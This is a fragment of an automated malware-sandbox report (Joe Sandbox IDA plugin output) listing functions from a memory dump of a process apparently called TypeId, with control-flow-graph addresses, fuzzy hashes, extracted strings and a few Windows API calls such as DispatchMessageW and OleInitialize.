                                                                                                  control_flow_graph 75 e9b7a0-e9b7d4 78 e9b7ef 75->78 79 e9b7d6-e9b7dd 75->79 83 e9b7f7 78->83 80 e9b7df-e9b7e4 79->80 81 e9b7e6-e9b7ed 79->81 82 e9b7fa-e9b80e 80->82 81->82 85 e9b810-e9b817 82->85 86 e9b824-e9b82c 82->86 83->82 87 e9b819-e9b81b 85->87 88 e9b81d-e9b822 85->88 89 e9b82e-e9b832 86->89 87->89 88->89 91 e9b892-e9b895 89->91 92 e9b834-e9b849 89->92 93 e9b8dd-e9b8e3 91->93 94 e9b897-e9b8ac 91->94 92->91 100 e9b84b-e9b84e 92->100 95 e9b8e9-e9b8eb 93->95 96 e9c3de 93->96 94->93 104 e9b8ae-e9b8b2 94->104 95->96 98 e9b8f1-e9b8f6 95->98 103 e9c3e3-e9c408 96->103 101 e9c38c-e9c390 98->101 102 e9b8fc 98->102 105 e9b86d-e9b88b call e90380 100->105 106 e9b850-e9b852 100->106 108 e9c392-e9c395 101->108 109 e9c397-e9c3dd 101->109 102->102 110 e9b8ba-e9b8d8 call e90380 104->110 111 e9b8b4-e9b8b8 104->111 105->91 106->105 112 e9b854-e9b857 106->112 108->103 108->109 110->93 111->93 111->110 112->91 116 e9b859-e9b86b 112->116 116->91 116->105
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xgq$Xgq$Xgq$Xgq
                                                                                                  • API String ID: 0-1951159037
                                                                                                  • Opcode ID: 4056c446e86ec58d02f14d39e5e7f9c6ee70ee5533df614e58195696d634103f
                                                                                                  • Instruction ID: 487889590f871268e000b46be39e93ef9cc13fb902131455e7bac5242a8c0672
                                                                                                  • Opcode Fuzzy Hash: 4056c446e86ec58d02f14d39e5e7f9c6ee70ee5533df614e58195696d634103f
                                                                                                  • Instruction Fuzzy Hash: D351B874E043298FDF789B6899503BE7BB6BB88314F1055A6C415B7390DF308D85CB92
                                                                                                  Function 00E9C9E0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 189 e9c9e0-e9c9f9 191 e9c9fb-e9c9fd 189->191 192 e9ca0a-e9ca12 189->192 193 e9c9ff-e9ca01 191->193 194 e9ca03-e9ca08 191->194 195 e9ca14-e9ca22 192->195 193->195 194->195 198 e9ca38-e9ca40 195->198 199 e9ca24-e9ca26 195->199 203 e9ca43-e9ca46 198->203 200 e9ca28-e9ca2d 199->200 201 e9ca2f-e9ca36 199->201 200->203 201->203 204 e9ca48-e9ca56 203->204 205 e9ca5d-e9ca61 203->205 204->205 211 e9ca58 204->211 206 e9ca7a-e9ca7d 205->206 207 e9ca63-e9ca71 205->207 209 e9ca7f-e9ca83 206->209 210 e9ca85-e9caba 206->210 207->206 217 e9ca73 207->217 209->210 213 e9cabc-e9cad3 209->213 218 e9cb1c-e9cb21 210->218 211->205 215 e9cad9-e9cae5 213->215 216 e9cad5-e9cad7 213->216 219 e9caef-e9caf9 215->219 220 e9cae7-e9caed 215->220 216->218 217->206 222 e9cb01 219->222 223 e9cafb 219->223 220->222 225 e9cb09-e9cb15 222->225 223->222 225->218
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xgq$Xgq
                                                                                                  • API String ID: 0-2113765878
                                                                                                  • Opcode ID: cc5dfc5bc8006e68fea690b035737c642bde7db21a8cbb5da7abb086fc31567b
                                                                                                  • Instruction ID: 6c75ce9bdd3a1b91ff25bed0078cac481f1917394d56ca55e3f624d89d26542a
                                                                                                  • Opcode Fuzzy Hash: cc5dfc5bc8006e68fea690b035737c642bde7db21a8cbb5da7abb086fc31567b
                                                                                                  • Instruction Fuzzy Hash: E5310975B042298BDF1CA679899427F65D6ABC4354F345439D807E3390EFB4CC4493A1
                                                                                                  Function 00E97C52 Relevance: 2.5, Strings: 2, Instructions: 13COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 228 e97c52-e97c80 231 e97c8c-e97c8d 228->231
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \f$i
                                                                                                  • API String ID: 0-1075964705
                                                                                                  • Opcode ID: 8c0a0984b818e7666d57ff98db8146443a38868bbae18cd7d7d8f4164b94a05e
                                                                                                  • Instruction ID: 3a0aee058deac1f8cfb76bf92c7a123e4ebbbefc5cca8c0bd1fb843db7a8dada
                                                                                                  • Opcode Fuzzy Hash: 8c0a0984b818e7666d57ff98db8146443a38868bbae18cd7d7d8f4164b94a05e
                                                                                                  • Instruction Fuzzy Hash: FEE092F49102689FCF649B50DC94A9DBA72BB86305F0011E8A60D73260CB321E859F19
                                                                                                  Function 06C94338 Relevance: 1.6, APIs: 1, Instructions: 81windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 6c94338-6c9433c 233 6c942c9-6c94302 232->233 234 6c9433e-6c9433f 232->234 237 6c9430b-6c9432c 233->237 238 6c94304-6c9430a 233->238 236 6c94340-6c943aa DispatchMessageW 234->236 239 6c943ac-6c943b2 236->239 240 6c943b3-6c943c7 236->240 238->237 239->240
                                                                                                  APIs
                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06C9396F), ref: 06C9439D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4589842345.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_6c90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DispatchMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 2061451462-0
                                                                                                  • Opcode ID: 1c8466e298b9259a440c6359725ddc17f0ef999efaed3f888d6e9ee984c54c71
                                                                                                  • Instruction ID: 0eb534396eb38a545e195dca891941d2c637cc110f7b7e43d76551f2fb7b6ea9
                                                                                                  • Opcode Fuzzy Hash: 1c8466e298b9259a440c6359725ddc17f0ef999efaed3f888d6e9ee984c54c71
                                                                                                  • Instruction Fuzzy Hash: 373166B1C047498FCB10CFAAE848BDEFBF4AB48314F14845AE458A3241C338A545CFA6
                                                                                                  Function 06C924F0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 243 6c924f0-6c93492 OleInitialize 245 6c9349b-6c934b8 243->245 246 6c93494-6c9349a 243->246 246->245
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 06C93485
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4589842345.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_6c90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: c8de5471a279b394cf923b236a83a6f863fe66bb37430c40f19f494c286eb264
                                                                                                  • Instruction ID: 542967f03dd545912736f8bd94b09f835820f614455e699245e872678592dda7
                                                                                                  • Opcode Fuzzy Hash: c8de5471a279b394cf923b236a83a6f863fe66bb37430c40f19f494c286eb264
                                                                                                  • Instruction Fuzzy Hash: 321115B1C103898FDB60DF9AD448B9EFFF4EB48324F118459D519A7600D375A944CFA5
                                                                                                  Function 06C9342B Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 254 6c9342b-6c9342d 255 6c93430-6c93492 OleInitialize 254->255 256 6c9349b-6c934b8 255->256 257 6c93494-6c9349a 255->257 257->256
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 06C93485
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4589842345.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_6c90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: f6276933a68b8ae5524bdc5346fe49fa5ab1178df6543f7b8016cb08ba364243
                                                                                                  • Instruction ID: ddd7072515e1638744ad54ed6560cb5eff37b063580be127528ba33a504a2879
                                                                                                  • Opcode Fuzzy Hash: f6276933a68b8ae5524bdc5346fe49fa5ab1178df6543f7b8016cb08ba364243
                                                                                                  • Instruction Fuzzy Hash: 3E1103B5C103898FDB20DF9AD448B8EFFF8EB49320F248459D519A3240C379A544CFA5
                                                                                                  Function 06C9259C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 249 6c9259c-6c943aa DispatchMessageW 251 6c943ac-6c943b2 249->251 252 6c943b3-6c943c7 249->252 251->252
                                                                                                  APIs
                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06C9396F), ref: 06C9439D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4589842345.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_6c90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DispatchMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 2061451462-0
                                                                                                  • Opcode ID: 760eaacc6e459d67689d72ec611d72cd3b3dbbcfe9bd086450c3a30246f4c033
                                                                                                  • Instruction ID: f52697aa7c143b7dda90cdee59d9792a52ed4e00af508a9f74e02944ccc37478
                                                                                                  • Opcode Fuzzy Hash: 760eaacc6e459d67689d72ec611d72cd3b3dbbcfe9bd086450c3a30246f4c033
                                                                                                  • Instruction Fuzzy Hash: 4011F2B1C046498FCB24DFAAD448BDEFBF4EB48310F10842AD819A3200D378A545CFA5
                                                                                                  Function 00E927B7 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 323 e927b7-e927c7 325 e927d3-e927f4 323->325
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %
                                                                                                  • API String ID: 0-2567322570
                                                                                                  • Opcode ID: a6210a10ec59f8180a061785c4caf68c21a2753298f99019cf188e016b2630eb
                                                                                                  • Instruction ID: e6deb63d35275a2095ba51aa30d0a9a594deea8b2d65b095e61661c241603b0e
                                                                                                  • Opcode Fuzzy Hash: a6210a10ec59f8180a061785c4caf68c21a2753298f99019cf188e016b2630eb
                                                                                                  • Instruction Fuzzy Hash: ABE012B0A0011A9FDB14EB64EE55B9D77B1EBC1301F10A4A4910577295CE741F449F01
                                                                                                  Function 00E9EC90 Relevance: .1, Instructions: 112COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 525 e9ec90-e9ecaa 526 e9ecac 525->526 527 e9ecb1-e9ecbe 525->527 526->527 528 e9ecc0-e9ecc3 527->528 529 e9ecc6-e9eccc 528->529 530 e9ecce 529->530 531 e9ecd5-e9ecd6 529->531 530->531 532 e9ed6b 530->532 533 e9ecdb-e9ecfb 530->533 534 e9ed9a 530->534 535 e9edae-e9edbd 530->535 536 e9ed30 530->536 537 e9edf3 530->537 538 e9ed63-e9ed6a 530->538 539 e9edc2-e9ede0 call e93f80 530->539 540 e9ed07 530->540 541 e9ee07-e9ee27 530->541 531->537 548 e9ed72-e9ed89 532->548 533->529 557 e9ecfd-e9ed05 533->557 551 e9eda1-e9eda9 534->551 535->529 546 e9ed37-e9ed50 536->546 547 e9edfa-e9ee02 537->547 539->529 553 e9ede6-e9edee 539->553 544 e9ed0e-e9ed24 540->544 541->529 556 e9ee2d-e9ee35 541->556 544->529 552 e9ed26-e9ed2e 544->552 546->529 554 e9ed56-e9ed5e 546->554 547->528 548->529 555 e9ed8f-e9ed95 548->555 551->529 552->529 553->529 554->529 555->529 556->529 557->529
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 66625ea274b04c4f67e0fac206d0cb7115ab7dedb0a74fac029e56f9f6c96584
                                                                                                  • Instruction ID: 3952a474876422c69ab4b6992d4b5446e5919990ded658d67fd5cfb21f338f8d
                                                                                                  • Opcode Fuzzy Hash: 66625ea274b04c4f67e0fac206d0cb7115ab7dedb0a74fac029e56f9f6c96584
                                                                                                  • Instruction Fuzzy Hash: AD4101B4C01249DFDB00DF9AD549BEEBBF0EB0A309F14A8A5E114B2351C7B84A88CF10
                                                                                                  Function 00E9B480 Relevance: .1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cfda04c493fd8bf5ac132b3ea8beaacc55b7f4f589d7703d8cd17ab73e7dc68
                                                                                                  • Instruction ID: 5d7b13de6659c5e963edc3b5e2096627d1cabc7ed77116c3100710f470abe0a2
                                                                                                  • Opcode Fuzzy Hash: 7cfda04c493fd8bf5ac132b3ea8beaacc55b7f4f589d7703d8cd17ab73e7dc68
                                                                                                  • Instruction Fuzzy Hash: 0F310174D1020C9FDB04DFA9E554ADDBBF2AF89300F10906AE41AB3261EB346A44DF51
                                                                                                  Function 00E9B490 Relevance: .1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 547d29b53d45bcbc06252ee23c883221b9c1a1bed706adac661f8869c12419fc
                                                                                                  • Instruction ID: cb0213f23dc3567874cf894b7a9551f8c08752f725966ddd4dd86a871e4a377b
                                                                                                  • Opcode Fuzzy Hash: 547d29b53d45bcbc06252ee23c883221b9c1a1bed706adac661f8869c12419fc
                                                                                                  • Instruction Fuzzy Hash: 5C31DF74D10208DFDF04DFA9E654AEDBBF2EF89300F10906AE41AB7261EB346A44DB51
                                                                                                  Function 00E9B440 Relevance: .1, Instructions: 81COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f4256c16f1040138ca9e33e5b26dc4ad3afb089e2e1312c4c0636f7e29ebcb54
                                                                                                  • Instruction ID: dc6ddb7a55f5849e8fde010e7726856bdab510eb0f0ddaa60618efac256e48a6
                                                                                                  • Opcode Fuzzy Hash: f4256c16f1040138ca9e33e5b26dc4ad3afb089e2e1312c4c0636f7e29ebcb54
                                                                                                  • Instruction Fuzzy Hash: 1F31F174D14208DFCB00DFA9E594AEDBBF1AF49304F2490AAD41ABB211E7346A44DB55
                                                                                                  Function 00E93F73 Relevance: .1, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b25590381f1650044f44535ce0856d6413d6b96877ace1db91322641eb1e5e65
                                                                                                  • Instruction ID: 530db9c672dc7294a2a5577e652cab054942aa596f7bd024dd983e1adc900c06
                                                                                                  • Opcode Fuzzy Hash: b25590381f1650044f44535ce0856d6413d6b96877ace1db91322641eb1e5e65
                                                                                                  • Instruction Fuzzy Hash: C82106B4F052899FCB14DF75E849BAEBFF1EB86305F1492EAD444A72A1D7700A09DB01
                                                                                                  Function 00E9B618 Relevance: .1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 517525337e24b531a0ae081f1cb9eb212f884524e75a3cd045e74120e47f2d41
                                                                                                  • Instruction ID: 8e61c0330db8cbe5aaa2f33636c9d6d0a70b3c027612945101060c988e88e29f
                                                                                                  • Opcode Fuzzy Hash: 517525337e24b531a0ae081f1cb9eb212f884524e75a3cd045e74120e47f2d41
                                                                                                  • Instruction Fuzzy Hash: EB219235A00106AFCF14DF24D9509AE77B5EFD9364B20C459D8199B3A8EB31EE06CB90
                                                                                                  Function 00E4D005 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4556668885.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e4d000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 637d1b77edad4709d5469671064ffb1826f3341552207fba8532fb5deff65928
                                                                                                  • Instruction ID: a390dda9e80cf5ff5b15cd5cfc3d2531408054ef15c1e8875ab24a0546073550
                                                                                                  • Opcode Fuzzy Hash: 637d1b77edad4709d5469671064ffb1826f3341552207fba8532fb5deff65928
                                                                                                  • Instruction Fuzzy Hash: 51212C7150D3C49FCB03CB24D994711BF71AB46214F29C5EBD8898F2A7C23A985ACB62
                                                                                                  Function 00E4D030 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4556668885.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e4d000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4b91a7765b3046cfe889cf03159442f41d839f41e4ddaffa2a8e5692de195c67
                                                                                                  • Instruction ID: c0a67edea8463c0adb444d70ecda228788f7b7005784894fac8952ced3c33391
                                                                                                  • Opcode Fuzzy Hash: 4b91a7765b3046cfe889cf03159442f41d839f41e4ddaffa2a8e5692de195c67
                                                                                                  • Instruction Fuzzy Hash: 052137B1508204DFCB10DF14EDC0B26BBA6FB84318F34C56DD8091B242C376D807CA61
                                                                                                  Function 00E9D16F Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f67237d6375c33e36a2b3bc6a3646ce5a4ddf0ca2614c28ba6a7c02267dc0e34
                                                                                                  • Instruction ID: fef8b1e949e0a45aa35818e23fb48ad5b9b57914eb4c9834703e95da39de7f7e
                                                                                                  • Opcode Fuzzy Hash: f67237d6375c33e36a2b3bc6a3646ce5a4ddf0ca2614c28ba6a7c02267dc0e34
                                                                                                  • Instruction Fuzzy Hash: 7521E475E4A269CFDF14CF9ADD44BA9BBF1BB49304F20A0A5D009BB264D7B48984CF10
                                                                                                  Function 00E9CF47 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ff4b8f0b0ead2d432d6599bf6a739cffd604a3a33e07b9bd218295fec546400e
                                                                                                  • Instruction ID: 7be6fe355a2e11760b3011407d6ae7e453f427a714236449058ba19588c67fa6
                                                                                                  • Opcode Fuzzy Hash: ff4b8f0b0ead2d432d6599bf6a739cffd604a3a33e07b9bd218295fec546400e
                                                                                                  • Instruction Fuzzy Hash: 72118D74E15218DFDF10DFA9D980BADB7F2AB49304F20A4AAE809B7251DB309981CF10
                                                                                                  Function 00E93F13 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 098ce6f0aaa63a40b8ef0007216f513f7048f81308d8a9fbd92ef949cdb0f4cb
                                                                                                  • Instruction ID: b4fcac5e02c782335930ffff0de9c641eb9f9a31817963b5fd36e1786d363152
                                                                                                  • Opcode Fuzzy Hash: 098ce6f0aaa63a40b8ef0007216f513f7048f81308d8a9fbd92ef949cdb0f4cb
                                                                                                  • Instruction Fuzzy Hash: 1A01FCB0E092858FDB05DF75A8457AEBFB1EB57304F1491DED404A72E2EB710A09DB41
                                                                                                  Function 00E9D2F6 Relevance: .0, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a833230aeaf6df7749cc44d94becf4044d5f72be230f5465c9e3df047212e07d
                                                                                                  • Instruction ID: 2937632cd32d824f09c4a1bf7c5bff9af55507316a99f769de1cbe76b1bc4a50
                                                                                                  • Opcode Fuzzy Hash: a833230aeaf6df7749cc44d94becf4044d5f72be230f5465c9e3df047212e07d
                                                                                                  • Instruction Fuzzy Hash: B611E874A10214CFDB54DF28D595F5D77F2FB09300F9154AAE40AAB2A1DB309E85CF01
                                                                                                  Function 00E9B5C8 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35501be837152a505bac84d8196cffc83151801b000e27c15bc338ee9cc989b4
                                                                                                  • Instruction ID: c73ecea37c8a19b57d430ae4bf4c187b48409876788cc4ac11e1b1093e38cea0
                                                                                                  • Opcode Fuzzy Hash: 35501be837152a505bac84d8196cffc83151801b000e27c15bc338ee9cc989b4
                                                                                                  • Instruction Fuzzy Hash: 81E0D835D142678FCB11DBA8D8148ED7F31FF873107064696D41077565EB305618C790
                                                                                                  Function 00E93F80 Relevance: .0, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7661239b8c0c8f5eebb90a4395b1bc6ab7b8ce41ff348edd006e61755aaa44c1
                                                                                                  • Instruction ID: e6c61cd65d745c6560d8d383faba8fe643fbf60c96af3a53d2f0d31f0f6d965c
                                                                                                  • Opcode Fuzzy Hash: 7661239b8c0c8f5eebb90a4395b1bc6ab7b8ce41ff348edd006e61755aaa44c1
                                                                                                  • Instruction Fuzzy Hash: E7E0DFB0E012089FCB14DB75A80ABA9BAF8A743308F009299D004B3290DBB10A0CE746
                                                                                                  Function 00E9D278 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 58550f522ccb374fa5aa8ade4196ce1f39b7705b3ca9a213d19e58f5f6795bf0
                                                                                                  • Instruction ID: d63eb4b4c4e29e28081e3195dbc22f4a744dd7830247a5e93bdfc5192f33ec2e
                                                                                                  • Opcode Fuzzy Hash: 58550f522ccb374fa5aa8ade4196ce1f39b7705b3ca9a213d19e58f5f6795bf0
                                                                                                  • Instruction Fuzzy Hash: 6BF07F78E24218DFDF10DF68D888B9CBBB1FB09315F6055AAE809A3255C770A985CF01
                                                                                                  Function 00E93AB4 Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.4557273362.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_e90000_TypeId.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa786de26e2dbefe7536b73e1d9ddef15e54863e6ea21f6f7702b128c1803728
